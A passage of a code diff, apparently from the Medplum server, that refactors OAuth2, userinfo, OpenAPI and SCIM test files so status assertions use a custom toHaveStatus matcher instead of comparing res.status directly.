       grant_type: 'authorization_code',
@@ -1508,7 +1508,7 @@ describe('OAuth2 Token', () => {
       scope: 'openid offline_access',
     });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1573,7 +1573,7 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Get tokens
     const res2 = await request(app).post('/oauth2/token').type('form').send({
@@ -1581,7 +1581,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.patient).toStrictEqual(testPatient.profile.id);
@@ -1614,7 +1614,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -1640,7 +1640,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Client not found',
@@ -1666,7 +1666,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Client must have a JWK Set URL',
@@ -1700,7 +1700,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid client assertion audience',
@@ -1734,7 +1734,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid client assertion issuer',
@@ -1768,7 +1768,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid client assertion signature',
@@ -1803,7 +1803,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(jwtVerify).toHaveBeenCalledTimes(3);
   });
 
@@ -1834,7 +1834,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(jwtVerify).toHaveBeenCalledTimes(2);
   });
 
@@ -1865,7 +1865,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: 'urn%3Aietf%3Aparams%3Aoauth%3Aclient-assertion-type%3Ajwt-bearer',
       client_assertion: jwt,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Unsupported client assertion type',
@@ -1878,7 +1878,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: '', // empty JWT
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid client assertion',
@@ -1891,7 +1891,7 @@ describe('OAuth2 Token', () => {
       client_assertion_type: OAuthClientAssertionType.JwtBearer,
       client_assertion: 'foo', // not a valid JWT
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid client assertion',
@@ -1916,7 +1916,7 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -1925,7 +1925,7 @@ describe('OAuth2 Token', () => {
       client_secret: client.secret,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.patient).toBeDefined();
     expect(res2.body.encounter).toBeDefined();
   });
@@ -1972,7 +1972,7 @@ describe('OAuth2 Token', () => {
         codeChallenge: 'xyz',
         codeChallengeMethod: 'plain',
       });
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const res2 = await request(app).post('/oauth2/token').type('form').send({
         grant_type: 'authorization_code',
@@ -1981,7 +1981,7 @@ describe('OAuth2 Token', () => {
         client_secret: client.secret,
         code_verifier: 'xyz',
       });
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
       // When identifier is present, it should be returned instead of the FHIR resource ID
       expect(res2.body[responseField]).toBe(externalId);
     }
@@ -1995,7 +1995,7 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -2004,7 +2004,7 @@ describe('OAuth2 Token', () => {
       client_secret: client.secret,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('IP address block', async () => {
@@ -2013,7 +2013,7 @@ describe('OAuth2 Token', () => {
       email,
       password,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('IP address not allowed');
   });
 
@@ -2026,7 +2026,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -2041,7 +2041,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -2065,7 +2065,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthConfigClientId,
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(res.body.expires_in).toBe(3600);
     const claims = (await verifyJwt(res.body.access_token)).payload;
@@ -2093,7 +2093,7 @@ describe('OAuth2 Token', () => {
       client_id: externalIdentityProvider.clientId,
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(fetchMock).toHaveBeenCalledWith('https://server-config.example.com/oauth2/userinfo', expect.anything());
   });
@@ -2115,7 +2115,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthConfigClientId,
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(fetchMock).toHaveBeenCalledWith('https://server-config.example.com/oauth2/userinfo', expect.anything());
   });
@@ -2127,7 +2127,7 @@ describe('OAuth2 Token', () => {
       client_id: randomUUID(),
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
     expect(fetchMock).not.toHaveBeenCalled();
@@ -2151,7 +2151,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
     expect(fetchMock).not.toHaveBeenCalled();
@@ -2177,7 +2177,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'opaque-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(fetchMock).toHaveBeenCalledWith('https://example.com/oauth2/userinfo', expect.anything());
   });
@@ -2206,7 +2206,7 @@ describe('OAuth2 Token', () => {
       subject_token: 'opaque-token',
       membership_id: otherMembership.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(res.body.project.reference).toBe(`Project/${otherProject.id}`);
   });
@@ -2223,7 +2223,7 @@ describe('OAuth2 Token', () => {
       subject_token: 'opaque-token',
       membership_id: randomUUID(),
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid membership');
     expect(fetchMock).not.toHaveBeenCalled();
@@ -2251,7 +2251,7 @@ describe('OAuth2 Token', () => {
     } finally {
       readResourceSpy.mockRestore();
     }
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid membership');
     expect(fetchMock).not.toHaveBeenCalled();
@@ -2266,7 +2266,7 @@ describe('OAuth2 Token', () => {
       client_id: gcipAuthClient.id,
       subject_token: 'firebase-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(fetch).toHaveBeenCalledWith(
       'https://identitytoolkit.googleapis.com/v1/accounts:lookup?key=test-api-key',
@@ -2311,7 +2311,7 @@ describe('OAuth2 Token', () => {
       client_id: gcipSubjectAuthClient.id,
       subject_token: 'firebase-token',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -2324,7 +2324,7 @@ describe('OAuth2 Token', () => {
       client_id: gcipAuthClient.id,
       subject_token: 'firebase-token',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error_description).toBe('Failed to verify code - invalid user info response');
   });
 
@@ -2337,7 +2337,7 @@ describe('OAuth2 Token', () => {
       client_id: gcipAuthClient.id,
       subject_token: 'firebase-token',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error_description).toBe('Failed to verify code - missing localId in user info response');
   });
 
@@ -2348,7 +2348,7 @@ describe('OAuth2 Token', () => {
       client_id: gcipMissingKeyClient.id,
       subject_token: 'firebase-token',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error_description).toBe('Missing user info API key - check your identity provider configuration');
     expect(fetchMock).not.toHaveBeenCalled();
   });
@@ -2362,7 +2362,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Failed to verify code - unsupported content type: text/plain');
   });
@@ -2376,7 +2376,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(429);
+    expect(res).toHaveStatus(429);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Too Many Requests');
   });
@@ -2388,7 +2388,7 @@ describe('OAuth2 Token', () => {
       client_id: '',
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -2400,7 +2400,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid subject_token');
   });
@@ -2412,7 +2412,7 @@ describe('OAuth2 Token', () => {
       client_id: externalAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid subject_token_type');
   });
@@ -2427,7 +2427,7 @@ describe('OAuth2 Token', () => {
       client_id: invalidAuthClient.id,
       subject_token: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Failed to verify code - check your identity provider configuration');
     expect(fetchMock).toHaveBeenCalled();
@@ -2440,7 +2440,7 @@ describe('OAuth2 Token', () => {
       client_secret: client.secret,
       scope: 'openid fhircast/Patient-open.read',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
     expect(res.body['hub.topic']).toBeDefined();
@@ -2453,7 +2453,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
     expect(res.body['hub.topic']).not.toBeDefined();
@@ -2483,14 +2483,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access', // Request offline_access access
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -2527,14 +2527,14 @@ describe('OAuth2 Token', () => {
       scope: 'openid', // Do not request offline_access access
       clientId: client.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -2552,7 +2552,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'client_credentials',
         client_id: randomUUID(),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toStrictEqual('invalid_request');
     expect(res.body.error_description).toBe('Error reading client: Not found');
   });
@@ -2566,7 +2566,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'client_credentials',
         client_id: client.id,
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toStrictEqual('invalid_request');
     expect(res.body.error_description).toBe('Client does not have a configured certificate trust store');
   });
@@ -2592,7 +2592,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'client_credentials',
         client_id: client.id,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -2602,7 +2602,7 @@ describe('OAuth2 Token', () => {
       grant_type: OAuthGrantType.PreAuthorizedCode,
       'pre-authorized_code': 'big-long-string',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing client_id');
   });
@@ -2612,7 +2612,7 @@ describe('OAuth2 Token', () => {
       grant_type: OAuthGrantType.PreAuthorizedCode,
       client_id: client.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing pre-authorized_code');
   });
@@ -2623,7 +2623,7 @@ describe('OAuth2 Token', () => {
       'pre-authorized_code': 'big-long-string',
       client_id: 'invalid-client-id',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_client');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -2634,7 +2634,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': 'invalid-code',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid pre-authorized_code');
   });
@@ -2663,7 +2663,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': preAuthorizedCode,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_grant');
     expect(res.body.error_description).toBe('Pre-authorized code expired');
   });
@@ -2686,7 +2686,7 @@ describe('OAuth2 Token', () => {
       .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount.profile))
       .type('json')
       .send({ clientId: client.id });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.preAuthorizedCode).toBeDefined();
     expect(res.body.code).toBeUndefined();
 
@@ -2697,7 +2697,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': res.body.preAuthorizedCode,
     });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
     expect(res1.body.error).toBe('invalid_request');
     expect(res1.body.error_description).toBe('IP address not allowed');
 
@@ -2708,7 +2708,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': res.body.preAuthorizedCode,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.error).toBeUndefined();
     expect(res2.body.access_token).toBeDefined();
   });
@@ -2722,7 +2722,7 @@ describe('OAuth2 Token', () => {
       .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount.profile))
       .type('json')
       .send({ clientId: client.id });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.preAuthorizedCode).toBeDefined();
     expect(res.body.code).toBeUndefined();
 
@@ -2731,7 +2731,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': res.body.preAuthorizedCode,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -2745,7 +2745,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       'pre-authorized_code': res.body.preAuthorizedCode,
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_grant');
     expect(res3.body.error_description).toBe('Token already granted');
   });

--- a/packages/server/src/oauth/userinfo.test.ts
+++ b/packages/server/src/oauth/userinfo.test.ts
@@ -35,20 +35,20 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
 
     const res3 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + res2.body.access_token);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.sub).toBeDefined();
     expect(res3.body.profile).toBeDefined();
     expect(res3.body.name).toBe('Medplum Admin');
@@ -74,14 +74,14 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
     const accessToken = res2.body.access_token;
 
@@ -94,7 +94,7 @@ describe('OAuth2 UserInfo', () => {
     const res3 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.sub).toBeDefined();
     expect(res3.body.profile).toBeDefined();
     expect(res3.body.name).toBe('Profile User');
@@ -111,14 +111,14 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
 
     // Set a phone number
@@ -143,12 +143,12 @@ describe('OAuth2 UserInfo', () => {
           value: telecom,
         },
       ]);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const res4 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + res2.body.access_token);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.phone_number).toBe(telecom[1].value);
   });
 
@@ -160,21 +160,21 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
 
     // Get the practitioner
     const res3 = await request(app)
       .get(`/fhir/R4/${res2.body.profile.reference}`)
       .set('Authorization', 'Bearer ' + res2.body.access_token);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     // Update the practitioner with an address
     const address = randomUUID();
@@ -186,12 +186,12 @@ describe('OAuth2 UserInfo', () => {
         ...res3.body,
         address: [{ city: address }],
       });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     const res5 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + res2.body.access_token);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.address.formatted).toBe(address);
   });
 
@@ -203,20 +203,20 @@ describe('OAuth2 UserInfo', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.access_token).toBeDefined();
 
     const res3 = await request(app)
       .get(`/oauth2/userinfo`)
       .set('Authorization', 'Bearer ' + res2.body.access_token);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.sub).toBeDefined();
     expect(res3.body.profile).toBeUndefined();
     expect(res3.body.name).toBeUndefined();
@@ -238,10 +238,10 @@ describe('OAuth2 UserInfo', () => {
         resourceType: profile.resourceType,
         id: profile.id,
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res3 = await request(app).get(`/oauth2/userinfo`).set('Authorization', `Bearer ${accessToken}`);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.sub).toStrictEqual(user.id);
     expect(res3.body.email).toStrictEqual(user.email);
     expect(res3.body.profile).toStrictEqual(getReferenceString(profile));
@@ -315,10 +315,10 @@ describe('OAuth2 UserInfo', () => {
           },
         ],
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const res3 = await request(app).get(`/oauth2/userinfo`).set('Authorization', `Bearer ${accessToken}`);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.sub).toStrictEqual(user.id);
     expect(res3.body.email).toStrictEqual(user.email);
     expect(res3.body.profile).toStrictEqual(getReferenceString(profile));

--- a/packages/server/src/openapi.test.ts
+++ b/packages/server/src/openapi.test.ts
@@ -19,7 +19,7 @@ describe('OpenAPI', () => {
 
   test('Get /openapi.json', async () => {
     const res = await request(app).get('/openapi.json');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.openapi).toBeDefined();
     expect(res.body.info).toBeDefined();
 

--- a/packages/server/src/scim/okta.test.ts
+++ b/packages/server/src/scim/okta.test.ts
@@ -54,7 +54,7 @@ describe('Okta SCIM Tests', () => {
     const res1 = await request(app)
       .get('/scim/v2/Users')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.Resources).not.toBeNull();
     expect(res1.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:ListResponse');
     expect(res1.body.itemsPerPage).toBeDefined();
@@ -74,7 +74,7 @@ describe('Okta SCIM Tests', () => {
     const res2 = await request(app)
       .get(`/scim/v2/Users/${isvUserId}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.id).toBeDefined();
     expect(res2.body.name.familyName).toBeDefined();
     expect(res2.body.name.givenName).toBeDefined();
@@ -88,7 +88,7 @@ describe('Okta SCIM Tests', () => {
     const res3 = await request(app)
       .get('/scim/v2/Users?filter=' + encodeURIComponent('userName eq "abcdefgh@atko.com"'))
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:ListResponse');
     expect(res3.body.totalResults).toBe(0);
 
@@ -97,7 +97,7 @@ describe('Okta SCIM Tests', () => {
     const res4 = await request(app)
       .get('/scim/v2/Users/invaliduserid')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(404);
+    expect(res4).toHaveStatus(404);
     expect(res4.body.detail).toBe('Not found');
     expect(res4.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:Error');
 
@@ -106,7 +106,7 @@ describe('Okta SCIM Tests', () => {
     const res5 = await request(app)
       .get('/scim/v2/Users?filter=' + encodeURIComponent('userName eq "Runscope258Fuhpfuwaw309@atko.com"'))
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
     expect(res5.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:ListResponse');
     expect(res5.body.totalResults).toBe(0);
 
@@ -124,7 +124,7 @@ describe('Okta SCIM Tests', () => {
         displayName: 'Runscope258 Fuhpfuwaw309',
         active: true,
       });
-    expect(res6.status).toBe(201);
+    expect(res6).toHaveStatus(201);
     expect(res6.body.active).toBe(true);
     expect(res6.body.id).toBeDefined();
     expect(res6.body.name.familyName).toBe('Fuhpfuwaw309');
@@ -140,7 +140,7 @@ describe('Okta SCIM Tests', () => {
     const res7 = await request(app)
       .get(`/scim/v2/Users/${idUserOne}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
     expect(res7.body.userName).toBe('Runscope258Fuhpfuwaw309@atko.com');
     expect(res7.body.name.familyName).toBe('Fuhpfuwaw309');
     expect(res7.body.name.givenName).toBe('Runscope258');
@@ -160,7 +160,7 @@ describe('Okta SCIM Tests', () => {
         displayName: 'Runscope258 Fuhpfuwaw309',
         active: true,
       });
-    expect(res8.status).toBe(409);
+    expect(res8).toHaveStatus(409);
     expect(res8.body.detail).toBe('User is already a member of this project');
     expect(res8.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:Error');
 
@@ -169,7 +169,7 @@ describe('Okta SCIM Tests', () => {
     const res9 = await request(app)
       .get('/scim/v2/Users?filter=' + encodeURIComponent('userName eq "RUNSCOPE258FUHPFUWAW309@ATKO.COM"'))
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
     expect(res9.body.schemas).toContain('urn:ietf:params:scim:api:messages:2.0:ListResponse');
     expect(res9.body.totalResults).toBe(1);
   });

--- a/packages/server/src/scim/routes.test.ts
+++ b/packages/server/src/scim/routes.test.ts
@@ -53,7 +53,7 @@ describe('SCIM Routes', () => {
     const res = await request(app)
       .get(`/scim/v2/Users`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const result = res.body;
     expect(result.totalResults).toBeDefined();
@@ -74,18 +74,18 @@ describe('SCIM Routes', () => {
         },
         emails: [{ value: randomUUID() + '@example.com' }],
       });
